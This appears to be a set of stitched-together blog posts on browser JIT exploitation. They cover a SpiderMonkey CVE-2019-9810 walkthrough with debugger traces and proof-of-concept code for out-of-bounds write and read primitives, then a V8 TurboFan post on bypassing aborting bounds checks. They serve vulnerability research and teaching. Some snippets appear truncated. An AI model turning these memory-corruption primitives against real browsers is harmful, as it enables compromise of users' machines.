0000035c97b8b2b7 4c891cea        mov     qword ptr [rdx+rbp*8],r11 ds:000031eac7502348=fff88000000003e6

0:000> r @rdx,@rbp
rdx=000031eac75021c8 rbp=0000000000000030


And then the invocation of slice:

0:000>
0000035c97b8b34b e83060ffff      call    0000035c97b81380

0:000> t
00000289d04b1380 48b9008021d658010000 mov rcx,158D6218000h

0:000> u . l20
...
0000035c97b813c6 e815600000      call    0000035c97b873e0

0:000> u 0000035c97b873e0 l1
0000035c97b873e0 ff2502000000    jmp     qword ptr [0000035c97b873e8]

0:000> dqs 0000035c97b873e8 l1
0000035c97b873e8  00007ff6e5c642a0 js!js::ArraySliceDense [c:\work\codes\mozilla-central\js\src\builtin\Array.cpp @ 3637]


Calling slice on Special

Then, making sure we triggered the side-effect and shrunk Arr right after the slicing operation (note that I added code in the PoC to print the address of Arr before and after the gc call otherwise we would have no way of getting its address). To witness that we have to do some more work to break on the right iteration (when Trigger is set to True) otherwise the function doesn't shrink Arr. This is to ensure that we warmed-up the JIT enough and that the function has been JIT'ed.

An easy way to break at the right iteration is by looking for something unique about it, like the fact that we use a different index: 0x20 instead of 0x30. For example, we can easily detect that with a breakpoint as below (on the cmp instruction for the boundscheck instruction):

0:000> bp 0000035c97b8b29a ".if(@ecx == 0x20){}.else{gc}"

0:000> eb 0000035c97b8b299 90

0:000> g
0000035c97b8b29a 3bd9            cmp     ebx,ecx

0:000> r.
ebx=0000000000000031  ecx=0000000000000020


Now we can head straight-up to js::ArraySliceDense:

0:000> g js!js::ArraySliceDense+0x40d
js!js::ArraySliceDense+0x40d:
00007ff6e5c646ad e8eee2ffff      call    js!js::array_slice (00007ff6e5c629a0)

0:000> ? 000031eac75021c8 - (2*8) - (2*8) - 20
Evaluate expression: 54884436025736 = 000031eac7502188

0:000> !smdump_jsobject 0x00031eac7502188
31eac7502188: js!js::ArrayObject:            Length: 126
31eac7502188: js!js::ArrayObject:          Capacity: 126
31eac7502188: js!js::ArrayObject: InitializedLength: 49
31eac7502188: js!js::ArrayObject:           Content: [magic, magic, magic, magic, magic, magic, magic, magic, magic, magic, ...]
@$smdump_jsobject(0x00031eac7502188) 0:000> p js!js::ArraySliceDense+0x412: 00007ff6e5c646b2 48337c2450 xor rdi,qword ptr [rsp+50h] ss:000000bd675fd270=fffe2d69e5e05100  We grab the address of the array after the gc on stdout and let's see (the array got moved from 0x00031eac7502188 to 0x0002B0A9D08F160): 0:000> !smdump_jsobject 0x0002B0A9D08F160 2b0a9d08f160: js!js::ArrayObject: Length: 0 2b0a9d08f160: js!js::ArrayObject: Capacity: 6 2b0a9d08f160: js!js::ArrayObject: InitializedLength: 0 2b0a9d08f160: js!js::ArrayObject: Content: [] @$smdump_jsobject(0x0002B0A9D08F160)


Witnessing the out-of-bounds store

And now the last stop is to observe the actual out-of-bounds happening.

0:000>
0000035c97b8b35d 8914c8          mov     dword ptr [rax+rcx*8],edx ds:00002b0a9d08f290=4f4f4f4f

0:000> r.
rcx=0000000000000020  rax=00002b0a9d08f190  edx=00000000000000bb

0:000> t
0000035c97b8b360 c744c8040080f8ff mov     dword ptr [rax+rcx*8+4],0FFF88000h ds:00002b0a9d08f294=4f4f4f4f


In the above @rax is the elements_ pointer that has a capacity of only 6 js::Value which means the only possible values of the index (@edx here) should be in [0 - 5]. In summary, we are able to write an integer js::Value which means we can control the lower 4 bytes but cannot control the upper 4 (that will be FFF88000). Thus, an ideal corruption target (doesn't mean this is the only thing we could do either) for this primitive is a size of an array like structure that is stored as a js::Value. Turns out this is exactly how the size of TypedArrays are stored - if you don't remember go have a look at my previous article Introduction to SpiderMonkey exploitation :).

In our case, if we look at the neighboring memory we find another array right behind us:

0:000> dqs 0x0002B0A9D08F160 l100
00002b0a9d08f160  00002b0a9d07dcd0
00002b0a9d08f168  00002b0a9d0987e8
00002b0a9d08f170  0000000000000000
00002b0a9d08f178  00002b0a9d08f190
00002b0a9d08f180  0000000000000000
00002b0a9d08f188  0000000000000006
00002b0a9d08f190  fffa800000000000
00002b0a9d08f198  fffa800000000000
00002b0a9d08f1a0  fffa800000000000
00002b0a9d08f1a8  fffa800000000000
00002b0a9d08f1b0  fffa800000000000
00002b0a9d08f1b8  fffa800000000000

00002b0a9d08f1c0  00002b0a9d07dc40 <- another array starting here
00002b0a9d08f1c8  00002b0a9d098890
00002b0a9d08f1d0  0000000000000000
00002b0a9d08f1d8  00002b0a9d08f1f0 <- elements_
00002b0a9d08f1e0  0000000000000000
00002b0a9d08f1e8  0000000000000006
00002b0a9d08f1f0  2f2f2f2f2f2f2f2f
00002b0a9d08f1f8  2f2f2f2f2f2f2f2f
00002b0a9d08f200  2f2f2f2f2f2f2f2f
00002b0a9d08f208  2f2f2f2f2f2f2f2f
00002b0a9d08f210  2f2f2f2f2f2f2f2f
00002b0a9d08f218  2f2f2f2f2f2f2f2f


So one way to get the interpreter to crash reliably is to overwrite its elements_ with a js::Value. It is guaranteed that this should crash the interpreter when it tries to collect the elements_ buffer as it won't even be a valid pointer. This field is reachable with the index 9 and so we just have to modify this line:

    Target(Snowflake, 0x9, 0xBB);


(d0.348c): Access violation - code c0000005 (!!! second chance !!!)
js!js::gc::Arena::finalize<JSObject>+0x12e:
00007ff6e601eb2e 8b43f0          mov     eax,dword ptr [rbx-10h] ds:fff88000000000ab=????????

0:000> kc
# Call Site
00 js!js::gc::Arena::finalize<JSObject>
01 js!FinalizeTypedArenas<JSObject>
02 js!FinalizeArenas
03 js!js::gc::ArenaLists::backgroundFinalize
04 js!js::gc::GCRuntime::sweepBackgroundThings
09 js!js::gc::GCRuntime::endSweepingSweepGroup
0a js!sweepaction::SweepActionSequence<js::gc::GCRuntime *,js::FreeOp *,js::SliceBudget &>::run
0b js!sweepaction::SweepActionRepeatFor<js::gc::SweepGroupsIter,JSRuntime *,js::gc::GCRuntime *,js::FreeOp *,js::SliceBudget &>::run
0c js!js::gc::GCRuntime::performSweepActions
0d js!js::gc::GCRuntime::incrementalSlice
0e js!js::gc::GCRuntime::gcCycle
0f js!js::gc::GCRuntime::collect
10 js!js::gc::GCRuntime::gc
11 js!JSRuntime::destroyRuntime
12 js!js::DestroyContext
13 js!main


Simplifying the PoC

OK so with this internal knowledge that we have gone through, we understand enough of the pieces at play to simplify the PoC. It's always good to verify assumptions in practice and so it'll be a good exercise to see if what we have learned above sticks.

First, we do not need an array of size 0x7e. Because the corruption target that we identified above is reachable at the index 0x20 (remember it's the neighboring array's elements_ field), we need the array to be able to store 0x21 elements. This is just to satisfy the boundscheck before we can shrink it.

We also know that the only role that the 0x30 index constant has been serving is to make sure that the first 0x30 elements in the array have been properly initialized. As the boundscheck operates against the initializedLength of the array, if we try to access at an index higher we will take a bailout. An easy way to not worry about this at all is to initialize entirely the array with a .fill(0) for example. Once this is done we can update the first index and use 0 instead of 0x30.

After all the modifications this is what you end up with:

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
Arr[Idx] = 0x41414141;
Special.slice();
Arr[Idx] = Value;
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
gc();
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x21);
Arr.fill(0);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0, Idx);
}

Trigger = true;
Target(Snowflake, 0x20, 0xBB);
}

main();


Conclusion

It has been quite some time that I’ve wanted to look at IonMonkey and this was a good opportunity (and a good spot to stop for now!).. We have covered quite a bit of content but obviously the engine is even more complicated as there are a bunch of things I haven't really studied yet.

At least we have uncovered the secrets of CVE-2019-9810 and its PoC as well as developed a few more commands for sm.js. For those that are interested in the exploit, you can find it here: CVE-2019-9810. It exploits Firefox on Windows 64-bit, loads a reflective-dll that embeds the payload. The payload infects the other tabs and sets-up a hook to inject arbitrary JavaScript. The demo payload changes the background of every visited website by the blog's background theme as well as redirecting every link to doar-e.github.io :).

If this was interesting for you, you might want to have a look at those other good resources concerning IonMonkey:

And if you want a bit more, what follows is a bunch of extra questions you might have asked yourself while reading that I answer (but that did not really fit the overall narrative) as well as a few puzzles if you want to explore Ion even more!

Little puzzles & extra quests

As said above, here are a bunch of extra questions / puzzles that did not really fit in the narrative. This does not mean they are not interesting so I just decided to stuff them here :).

Why does AccessArray(10) triggers a bailout?

let Arr = null;
function AccessArray(Idx) {
Arr[Idx] = 0xaaaaaaaa;
}

Arr = new Array(0x100);
for(let Idx = 0; Idx < 0x400; Idx++) {
AccessArray(1);
}

AccessArray(10);


Can the write out-of-bounds be transformed into an information disclosure?

It can! We can abuse the loadelement MIR instruction the same way we abused storeelement in which case we can read out-of-bounds memory.

let Trigger = false;
let Arr = null;

function Target(Special, Idx) {
Arr[Idx];
Special.slice();
return Arr[Idx];
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
gc();
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x7e);
Arr.fill(0);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0x0);
}

Trigger = true;
print(Target(Snowflake, 0x6));
}

main();


What's a good way to check if the engine is vulnerable?

The most reliable way to check if the engine is vulnerable that I found is to actually use the vulnerability as out-of-bounds read to go and attempt to read out-of-bounds. At this point, there are two possible outcomes: correct execution should return undefined as the array has a size of 0, or you read leftover data in which case it is vulnerable.

let Trigger = false;
let Arr = null;

function Target(Special, Idx) {
Arr[Idx];
Special.slice();
return Arr[Idx];
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x7);
Arr.fill(1337);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0x0);
}

Trigger = true;
const Ret = Target(Snowflake, 0x5);
if(Ret === undefined) {
print(':( not vulnerable');
} else {
print(':) vulnerable');
}
}

main();


Can you write something bigger than a simple uint32?

In the blogpost, we focused on the integer JSValue out-of-bounds write, but you can also use it to store an arbitrary qword. Here is an example writing 0x44332211deadbeef!

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
Arr[Idx] = 4e-324;
Special.slice();
Arr[Idx] = Value;
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
gc();
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x21);
Arr.fill(0);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0, 5e-324);
}

Trigger = true;
Target(Snowflake, 0x20, 352943125510189150000);
}

main();


And here is the crash you should get eventually:

(e08.36ac): Access violation - code c0000005 (!!! second chance !!!)
mozglue!arena_dalloc+0x11:
00007ffc773323a1 488b3e          mov     rdi,qword ptr [rsi] ds:44332211dea00000=????????????????

0:000> dv /v aPtr
@rcx                         aPtr = 0x44332211deadbeef


Why does using 0xdeadbeef as a value triggers a bailout?

let Arr = null;
function AccessArray(Idx, Value) {
Arr[Idx] = Value;
}

Arr = new Array(0x100);
for(let Idx = 0; Idx < 0x400; Idx++) {
AccessArray(1, 0xaa);
}



Circumventing Chrome's hardening of typer bugs

9 May 2019 at 15:00

Introduction

Some recent Chrome exploits were taking advantage of Bounds-Check-Elimination in order to get a R/W primitive from a TurboFan's typer bug (a bug that incorrectly computes type information during code optimization). Indeed during the simplified lowering phase when visiting a CheckBounds node if the engine can guarantee that the used index is always in-bounds then the CheckBounds is considered redundant and thus removed. I explained this in my previous article. Recently, TurboFan introduced a change that adds aborting bound checks. It means that CheckBounds will never get removed during simplified lowering. As mentioned by Mark Brand's article on the Google Project Zero blog and tsuro in his zer0con talk, this could be problematic for exploitation. This short post discusses the hardening change and how to exploit typer bugs against latest versions of v8. As an example, I provide a sample exploit that works on v8 7.5.0.

Introduction of aborting bound checks

Aborting bounds checks have been introduced by the following commit:

commit 7bb6dc0e06fa158df508bc8997f0fce4e33512a5
Author: Jaroslav Sevcik <[email protected]>
Date:   Fri Feb 8 16:26:18 2019 +0100

[turbofan] Introduce aborting bounds checks.

Instead of eliminating bounds checks based on types, we introduce
an aborting bounds check that crashes rather than deopts.

Bug: v8:8806
Commit-Queue: Jaroslav Sevcik <[email protected]>
Reviewed-by: Tobias Tebbi <[email protected]>


Simplified lowering

First, what has changed is the CheckBounds node visitor of simplified-lowering.cc:

  void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
CheckParameters const& p = CheckParametersOf(node->op());
Type const index_type = TypeOf(node->InputAt(0));
Type const length_type = TypeOf(node->InputAt(1));
if (length_type.Is(Type::Unsigned31())) {
if (index_type.Is(Type::Integral32OrMinusZero())) {
// Map -0 to 0, and the values in the [-2^31,-1] range to the
// [2^31,2^32-1] range, which will be considered out-of-bounds
// as well, because the {length_type} is limited to Unsigned31.
VisitBinop(node, UseInfo::TruncatingWord32(),
MachineRepresentation::kWord32);
if (lower()) {
CheckBoundsParameters::Mode mode =
CheckBoundsParameters::kDeoptOnOutOfBounds;
if (lowering->poisoning_level_ ==
PoisoningMitigationLevel::kDontPoison &&
(index_type.IsNone() || length_type.IsNone() ||
(index_type.Min() >= 0.0 &&
index_type.Max() < length_type.Min()))) {
// The bounds check is redundant if we already know that
// the index is within the bounds of [0.0, length[.
mode = CheckBoundsParameters::kAbortOnOutOfBounds;         // [1]
}
NodeProperties::ChangeOp(
node, simplified()->CheckedUint32Bounds(p.feedback(), mode)); // [2]
}
// [...]
}


Before the commit, if condition [1] happens, the bound check would have been removed using a call to DeferReplacement(node, node->InputAt(0));. Now, what happens instead is that the node gets lowered to a CheckedUint32Bounds with a AbortOnOutOfBounds mode [2].

Effect linearization

When the effect control linearizer (one of the optimization phase) kicks in, here is how the CheckedUint32Bounds gets lowered :

Node* EffectControlLinearizer::LowerCheckedUint32Bounds(Node* node,
Node* frame_state) {
Node* index = node->InputAt(0);
Node* limit = node->InputAt(1);
const CheckBoundsParameters& params = CheckBoundsParametersOf(node->op());

Node* check = __ Uint32LessThan(index, limit);
switch (params.mode()) {
case CheckBoundsParameters::kDeoptOnOutOfBounds:
__ DeoptimizeIfNot(DeoptimizeReason::kOutOfBounds,
params.check_parameters().feedback(), check,
frame_state, IsSafetyCheck::kCriticalSafetyCheck);
break;
case CheckBoundsParameters::kAbortOnOutOfBounds: {
auto if_abort = __ MakeDeferredLabel();
auto done = __ MakeLabel();

__ Branch(check, &done, &if_abort);

__ Bind(&if_abort);
__ Unreachable();
__ Goto(&done);

__ Bind(&done);
break;
}
}

return index;
}


Long story short, the CheckedUint32Bounds is replaced by an Uint32LessThan node (plus the index and limit nodes). In case of an out-of-bounds there will be no deoptimization possible but instead we will reach an Unreachable node.

During instruction selection Unreachable nodes are replaced by breakpoint opcodes.

void InstructionSelector::VisitUnreachable(Node* node) {
OperandGenerator g(this);
Emit(kArchDebugBreak, g.NoOutput());
}


Experimenting

Ordinary behaviour

Let's first experiment with some normal behaviour in order to get a grasp of what happens with bound checking. Consider the following code.

var opt_me = () => {
let arr = [1,2,3,4];
let idx = badly_typed * 5;
return arr[idx];
};
opt_me();
%OptimizeFunctionOnNextCall(opt_me);
opt_me();


With this example, we're going to observe a few things:

• simplified lowering does not remove the CheckBounds node as it would have before,
• the lowering of this node and how it leads to the creation of an Unreachable node,
• eventually, bound checking will get completely removed (which is correct and expected).

Typing of a CheckBounds

Without surprise, a CheckBounds node is generated and gets a type of Range(0,0) during the typer phase.

CheckBounds lowering to CheckedUint32Bounds

The CheckBounds node is not removed during simplified lowering the way it would have been before. It is lowered to a CheckedUint32Bounds instead.

Effect Linearization : CheckedUint32Bounds to Uint32LessThan with Unreachable

Let's have a look at the effect linearization.

The CheckedUint32Bounds is replaced by several nodes. Instead of this bound checking node, there is a Uint32LessThan node that either leads to a LoadElement node or an Unreachable node.

Late optimization : MachineOperatorReducer and DeadCodeElimination

It seems pretty obvious that the Uint32LessThan can be lowered to a constant true (Int32Constant). In the case of Uint32LessThan being replaced by a constant node the rest of the code, including the Unreachable node, will be removed by the dead code elimination. Therefore, no bounds check remains and no breakpoint will ever be reached, regardless of any OOB accesses that are attempted.

// Perform constant folding and strength reduction on machine operators.
Reduction MachineOperatorReducer::Reduce(Node* node) {
switch (node->opcode()) {
// [...]
case IrOpcode::kUint32LessThan: {
Uint32BinopMatcher m(node);
if (m.left().Is(kMaxUInt32)) return ReplaceBool(false);  // M < x => false
if (m.right().Is(0)) return ReplaceBool(false);          // x < 0 => false
if (m.IsFoldable()) {                                    // K < K => K
return ReplaceBool(m.left().Value() < m.right().Value());
}
if (m.LeftEqualsRight()) return ReplaceBool(false);  // x < x => false
if (m.left().IsWord32Sar() && m.right().HasValue()) {
Int32BinopMatcher mleft(m.left().node());
if (mleft.right().HasValue()) {
// (x >> K) < C => x < (C << K)
// when C < (M >> K)
const uint32_t c = m.right().Value();
const uint32_t k = mleft.right().Value() & 0x1F;
if (c < static_cast<uint32_t>(kMaxInt >> k)) {
node->ReplaceInput(0, mleft.left().node());
node->ReplaceInput(1, Uint32Constant(c << k));
return Changed(node);
}
// TODO(turbofan): else the comparison is always true.
}
}
break;
}
// [...]


Final scheduling : no more bound checking

To observe the generated code, let's first look at the final scheduling phase and confirm that eventually, only a Load at index 0 remains.

Generated assembly code

In this case, TurboFan correctly understood that no bound checking was necessary and simply generated a mov instruction movq rax, [fixed_array_base + offset_to_element_0].

To sum up :

1. arr[good_idx] leads to the creation of a CheckBounds node in the early phases
2. during "simplified lowering", it gets replaced by an aborting CheckedUint32Bounds
3. The CheckedUint32Bounds gets replaced by several nodes during "effect linearization" : Uint32LessThan and Unreachable
4. Uint32LessThan is constant folded during the "Late Optimization" phase
5. The Unreachable node is removed during dead code elimination of the "Late Optimization" phase
6. Only a simple Load remains during the final scheduling
7. Generated assembly is a simple mov instruction without bound checking

Typer bug

Let's consider the String#lastIndexOf bug where the typing of kStringIndexOf and kStringLastIndexOf is incorrect. The computed type is: Type::Range(-1.0, String::kMaxLength - 1.0, t->zone()) instead of Type::Range(-1.0, String::kMaxLength, t->zone()). This is incorrect because both String#indexOf and String#astIndexOf can return a value of kMaxLength. You can find more details about this bug on my github.

This bug is exploitable even with the introduction of aborting bound checks. So let's reintroduce it on v8 7.5 and exploit it.

In summary, if we use lastIndexOf on a string with a length of kMaxLength, the computed Range type will be kMaxLength - 1 while it is actually kMaxLength.

const str = "____"+"DOARE".repeat(214748359);
String.prototype.lastIndexOf.call(str, ''); // typed as kMaxLength-1 instead of kMaxLength


We can then amplify this typing error.

  let badly_typed = String.prototype.lastIndexOf.call(str, '');


If all of this seems unclear, check my previous introduction to TurboFan and my github.

Now, consider the following trigger poc :

SUCCESS = 0;
FAILURE = 0x42;

const str = "____"+"DOARE".repeat(214748359);

let it = 0;

var opt_me = () => {
const OOB_OFFSET = 5;

let leak = 0;

if (bad >= OOB_OFFSET && ++it < 0x10000) {
leak = 0;
}
else {
let arr = new Array(1.1,1.1);
arr2 = new Array({},{});
if (leak != undefined) {
return leak;
}
}
return FAILURE;
};

let res = opt_me();
for (let i = 0; i < 0x10000; ++i)
res = opt_me();
%DisassembleFunction(opt_me); // prints nothing on release builds
for (let i = 0; i < 0x10000; ++i)
res = opt_me();
print(res);
%DisassembleFunction(opt_me); // prints nothing on release builds


Checkout the result :

$d8 poc.js 1.5577100569205e-310  It worked despite those aborting bound checks. Why? The line leak = arr[bad] didn’t lead to any CheckBounds elimination and yet we didn't execute any Unreachable node (aka breakpoint instruction). Native context specialization of an element access The answer lies in the native context specialization. This is one of the early optimization phase where the compiler is given the opportunity to specialize code in a way that capitalizes on its knowledge of the context in which the code will execute. One of the first optimization phase is the inlining phase, that includes native context specialization. For element accesses, the context specialization is done in JSNativeContextSpecialization::BuildElementAccess. There is one case that looks very interesting when the load_mode is LOAD_IGNORE_OUT_OF_BOUNDS.  } else if (load_mode == LOAD_IGNORE_OUT_OF_BOUNDS && CanTreatHoleAsUndefined(receiver_maps)) { // Check that the {index} is a valid array index, we do the actual // bounds check below and just skip the store below if it's out of // bounds for the {receiver}. index = effect = graph()->NewNode( simplified()->CheckBounds(VectorSlotPair()), index, jsgraph()->Constant(Smi::kMaxValue), effect, control); } else {  In this case, the CheckBounds node checks the index against a length of Smi::kMaxValue. The actual bound checking nodes are added as follows:  if (load_mode == LOAD_IGNORE_OUT_OF_BOUNDS && CanTreatHoleAsUndefined(receiver_maps)) { Node* check = graph()->NewNode(simplified()->NumberLessThan(), index, length); // [1] Node* branch = graph()->NewNode( common()->Branch(BranchHint::kTrue, IsSafetyCheck::kCriticalSafetyCheck), check, control); Node* if_true = graph()->NewNode(common()->IfTrue(), branch); // [2] Node* etrue = effect; Node* vtrue; { // Perform the actual load vtrue = etrue = graph()->NewNode(simplified()->LoadElement(element_access), // [3] elements, index, etrue, if_true); // [...] } // [...] }  In a nutshell, with this mode : • CheckBounds checks the index against Smi::kMaxValue (0x7FFFFFFF), • A NumberLessThan node is generated, • An IfTrue node is generated, • In the "true" branch, there will be a LoadElement node. The length used by the NumberLessThan node comes from a previously generated LoadField:  Node* length = effect = receiver_is_jsarray ? graph()->NewNode( simplified()->LoadField( AccessBuilder::ForJSArrayLength(elements_kind)), receiver, effect, control) : graph()->NewNode( simplified()->LoadField(AccessBuilder::ForFixedArrayLength()), elements, effect, control);  All of this means that TurboFan does generate some bound checking nodes but there won't be any aborting bound check because of the kMaxValue length being used (well technically there is, but the maximum length is unlikely to be reached!). Type narrowing and constant folding of NumberLessThan After the typer phase, the sea of nodes contains a NumberLessThan that compares a badly typed value to the correct array length. This is interesting because the TyperNarrowingReducer is going to change the type [2] with op_typer_.singleton_true() [1].  case IrOpcode::kNumberLessThan: { // TODO(turbofan) Reuse the logic from typer.cc (by integrating relational // comparisons with the operation typer). Type left_type = NodeProperties::GetType(node->InputAt(0)); Type right_type = NodeProperties::GetType(node->InputAt(1)); if (left_type.Is(Type::PlainNumber()) && right_type.Is(Type::PlainNumber())) { if (left_type.Max() < right_type.Min()) { new_type = op_typer_.singleton_true(); // [1] } else if (left_type.Min() >= right_type.Max()) { new_type = op_typer_.singleton_false(); } } break; } // [...] Type original_type = NodeProperties::GetType(node); Type restricted = Type::Intersect(new_type, original_type, zone()); if (!original_type.Is(restricted)) { NodeProperties::SetType(node, restricted); // [2] return Changed(node); }  Thanks to that, the ConstantFoldingReducer will then simply remove the NumberLessThan node and replace it by a HeapConstant node. Reduction ConstantFoldingReducer::Reduce(Node* node) { DisallowHeapAccess no_heap_access; // Check if the output type is a singleton. In that case we already know the // result value and can simply replace the node if it's eliminable. if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) && node->op()->HasProperty(Operator::kEliminatable)) { // TODO(v8:5303): We must not eliminate FinishRegion here. This special // case can be removed once we have separate operators for value and // effect regions. if (node->opcode() == IrOpcode::kFinishRegion) return NoChange(); // We can only constant-fold nodes here, that are known to not cause any // side-effect, may it be a JavaScript observable side-effect or a possible // eager deoptimization exit (i.e. {node} has an operator that doesn't have // the Operator::kNoDeopt property). Type upper = NodeProperties::GetType(node); if (!upper.IsNone()) { Node* replacement = nullptr; if (upper.IsHeapConstant()) { replacement = jsgraph()->Constant(upper.AsHeapConstant()->Ref()); } else if (upper.Is(Type::MinusZero())) { Factory* factory = jsgraph()->isolate()->factory(); ObjectRef minus_zero(broker(), factory->minus_zero_value()); replacement = jsgraph()->Constant(minus_zero); } else if (upper.Is(Type::NaN())) { replacement = jsgraph()->NaNConstant(); } else if (upper.Is(Type::Null())) { replacement = jsgraph()->NullConstant(); } else if (upper.Is(Type::PlainNumber()) && upper.Min() == upper.Max()) { replacement = jsgraph()->Constant(upper.Min()); } else if (upper.Is(Type::Undefined())) { replacement = jsgraph()->UndefinedConstant(); } if (replacement) { // Make sure the node has a type. if (!NodeProperties::IsTyped(replacement)) { NodeProperties::SetType(replacement, upper); } ReplaceWithValue(node, replacement); return Changed(replacement); } } } return NoChange(); }  We confirm this behaviour using --trace-turbo-reduction: - In-place update of 200: NumberLessThan(199, 225) by reducer TypeNarrowingReducer - Replacement of 200: NumberLessThan(199, 225) with 94: HeapConstant[0x2584e3440659 <true>] by reducer ConstantFoldingReducer  At this point, there isn't any proper bound check left. Observing the generated assembly Let's run again the previous poc. We'll disassemble the function twice. The first optimized code we can observe contains code related to: • a CheckedBounds with a length of MaxValue, • a bound check with a NumberLessThan with the correct length.  ===== FIRST DISASSEMBLY ===== 0x11afad03119 119 41c1f91e sarl r9, 30 // badly_typed >> 30 0x11afad0311d 11d 478d0c89 leal r9,[r9+r9*4] // badly_typed * OOB_OFFSET 0x11afad03239 239 4c894de0 REX.W movq [rbp-0x20],r9 // CheckBounds (index = badly_typed, length = Smi::kMaxValue) 0x11afad0326f 26f 817de0ffffff7f cmpl [rbp-0x20],0x7fffffff 0x11afad03276 276 0f830c010000 jnc 0x11afad03388 <+0x388> // go to Unreachable // NumberLessThan (badly_typed, LoadField(array.length) = 2) 0x11afad0327c 27c 837de002 cmpl [rbp-0x20],0x2 0x11afad03280 280 0f8308010000 jnc 0x11afad0338e <+0x38e> // LoadElement 0x11afad03286 286 4c8b45e8 REX.W movq r8,[rbp-0x18] // FixedArray 0x11afad0328a 28a 4c8b4de0 REX.W movq r9,[rbp-0x20] // badly_typed * OOB_OFFSET 0x11afad0328e 28e c4817b1044c80f vmovsd xmm0,[r8+r9*8+0xf] // arr[bad] // Unreachable 0x11afad03388 388 cc int3l // Unreachable node  The second disassembly is much more interesting. Indeed, only the code corresponding to the CheckBounds remains. The actual bound check was removed!  ===== SECOND DISASSEMBLY ===== 335 0x2e987c30412f 10f c1ff1e sarl rdi, 30 // badly_typed >> 30 336 0x2e987c304132 112 4c8d4120 REX.W leaq r8,[rcx+0x20] 337 0x2e987c304136 116 8d3cbf leal rdi,[rdi+rdi*4] // badly_typed * OOB_OFFSET // CheckBounds (index = badly_typed, length = Smi::kMaxValue) 400 0x2e987c304270 250 81ffffffff7f cmpl rdi,0x7fffffff 401 0x2e987c304276 256 0f83b9000000 jnc 0x2e987c304335 <+0x315> 402 0x2e987c30427c 25c c5fb1044f90f vmovsd xmm0,[rcx+rdi*8+0xf] // unchecked access! 441 0x2e987c304335 315 cc int3l // Unreachable node  You can confirm it works by launching the full exploit on a patched 7.5 d8 shell. Conclusion As discussed in this article, the introduction of aborting CheckBounds kind of kills the CheckBound elimination technique for typer bug exploitation. However, we demonstrated a case where TurboFan would defer the bound checking to a NumberLessThan node that would then be incorrectly constant folded because of a bad typing. Thanks for reading this. Please feel free to shoot me any feedback via my twitter: @__x86. Special thanks to my friends Axel Souchet, yrp604 and Georgi Geshev for their review. Also, if you're interested in TurboFan, don't miss out my future typhooncon talk! A bit before publishing this post, saelo released a new phrack article on jit exploitation as well as the slides of his 0x41con talk. References Introduction to TurboFan 28 January 2019 at 16:00 Introduction Ages ago I wrote a blog post here called first dip in the kernel pool, this year we're going to swim in a sea of nodes! The current trend is to attack JavaScript engines and more specifically, optimizing JIT compilers such as V8's TurboFan, SpiderMonkey's IonMonkey, JavaScriptCore's Data Flow Graph (DFG) & Faster Than Light (FTL) or Chakra's Simple JIT & FullJIT. In this article we're going to discuss TurboFan and play along with the sea of nodes structure it uses. Then, we'll study a vulnerable optimization pass written by @_tsuro for Google's CTF 2018 and write an exploit for it. We’ll be doing that on a x64 Linux box but it really is the exact same exploitation for Windows platforms (simply use a different shellcode!). If you want to follow along, you can check out the associated repo. Setup Building v8 Building v8 is very easy. You can simply fetch the sources using depot tools and then build using the following commands: fetch v8 gclient sync ./build/install-build-deps.sh tools/dev/gm.py x64.release  Please note that whenever you're updating the sources or checking out a specific commit, do gclient sync or you might be unable to build properly. The d8 shell A very convenient shell called d8 is provided with the engine. For faster builds, limit the compilation to this shell: ~/v8$  ./tools/dev/gm.py x64.release d8


Try it:

~/v8$./out/x64.release/d8 V8 version 7.3.0 (candidate) d8> print("hello doare") hello doare  Many interesting flags are available. List them using d8 --help. In particular, v8 comes with runtime functions that you can call from JavaScript using the % prefix. To enable this syntax, you need to use the flag --allow-natives-syntax. Here is an example: $ d8 --allow-natives-syntax
V8 version 7.3.0 (candidate)
d8> let a = new Array('d','o','a','r','e')
undefined
d8> %DebugPrint(a)
DebugPrint: 0x37599d40aee1: [JSArray]
- map: 0x01717e082d91 <Map(PACKED_ELEMENTS)> [FastProperties]
- prototype: 0x39ea1928fdb1 <JSArray[0]>
- elements: 0x37599d40af11 <FixedArray[5]> [PACKED_ELEMENTS]
- length: 5
- properties: 0x0dfc80380c19 <FixedArray[0]> {
#length: 0x3731486801a1 <AccessorInfo> (const accessor descriptor)
}
- elements: 0x37599d40af11 <FixedArray[5]> {
0: 0x39ea1929d8d9 <String[#1]: d>
1: 0x39ea1929d8f1 <String[#1]: o>
2: 0x39ea1929d8c1 <String[#1]: a>
3: 0x39ea1929d909 <String[#1]: r>
4: 0x39ea1929d921 <String[#1]: e>
}
0x1717e082d91: [Map]
- type: JS_ARRAY_TYPE
- instance size: 32
- inobject properties: 0
- elements kind: PACKED_ELEMENTS
- unused property fields: 0
- enum length: invalid
- back pointer: 0x01717e082d41 <Map(HOLEY_DOUBLE_ELEMENTS)>
- prototype_validity cell: 0x373148680601 <Cell value= 1>
- instance descriptors #1: 0x39ea192909f1 <DescriptorArray[1]>
- layout descriptor: (nil)
- transitions #1: 0x39ea192909c1 <TransitionArray[4]>Transition array #1:
0x0dfc80384b71 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_ELEMENTS) -> 0x01717e082de1 <Map(HOLEY_ELEMENTS)>
- prototype: 0x39ea1928fdb1 <JSArray[0]>
- constructor: 0x39ea1928fb79 <JSFunction Array (sfi = 0x37314868ab01)>
